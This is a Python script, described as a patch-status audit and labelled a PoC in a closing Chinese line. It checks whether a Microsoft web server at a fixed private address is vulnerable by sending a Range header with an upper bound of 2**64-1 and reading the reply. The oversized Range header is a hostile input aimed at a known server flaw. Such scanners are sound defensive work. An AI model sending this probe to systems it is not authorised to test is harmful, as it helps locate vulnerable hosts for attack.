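# Patch-status audit for a single web server.
#
# Step 1 fetches "/" with a plain HTTP/1.0 request and stops unless the reply
# mentions "Microsoft". Step 2 repeats the fetch with a Range header whose
# upper bound is the largest unsigned 64-bit integer and classifies the server
# from the text of the reply.
#
# Each verdict is a substring match on the first 1024 bytes of the reply, so
# read it as an indication to confirm against the host's installed updates,
# not as proof.
import socket
import random

# Host to audit; both requests go to TCP port 80 on this address.
ipAddr = "10.1.89.20"
# Decimal text of 2**64 - 1. Despite the name this is not hex notation.
hexAllFfff = "18446744073709551615"
# HTTP lines end in CRLF. The escapes must be "\r\n"; the literal text "/r/n"
# is not a line terminator, so the server would never see a complete request.
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"


def _first_response_chunk(request):
    """Send one request to ipAddr:80 and return up to 1024 reply bytes as text.

    The connection is closed on every path, including when an exception is
    raised. The timeout keeps an unresponsive host from hanging the audit.
    Undecodable bytes are replaced, not raised, because only ASCII markers
    are searched for afterwards.
    """
    with socket.create_connection((ipAddr, 80), timeout=10) as conn:
        conn.sendall(request.encode())
        return conn.recv(1024).decode(errors="replace")


print("[*] Audit Started")

boringResp = _first_response_chunk(req1)
if "Microsoft" not in boringResp:
    # NOTE(review): this keys on the word "Microsoft" anywhere in the first
    # 1024 bytes. A server whose banner is suppressed or rewritten ends the
    # audit here without being assessed, so "Not IIS" is not a clean result.
    print("[*] Not IIS")
    raise SystemExit(0)

goodResp = _first_response_chunk(req)
if "Requested Range Not Satisfiable" in goodResp:
    # The range was parsed and rejected as out of bounds.
    print("[!!] Looks VULN")
elif " The request has an invalid header name" in goodResp:
    # The request was refused before range handling.
    print("[*] Looks Patched")
else:
    # NOTE(review): an intermediary answering for the origin server (reverse
    # proxy, load balancer, filtering device) presumably lands here. Confirm
    # the patch state on the host itself.
    print("[*] Unexpected response, cannot discern patch status")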
这个漏洞这几天也火了一把,PoC 附上。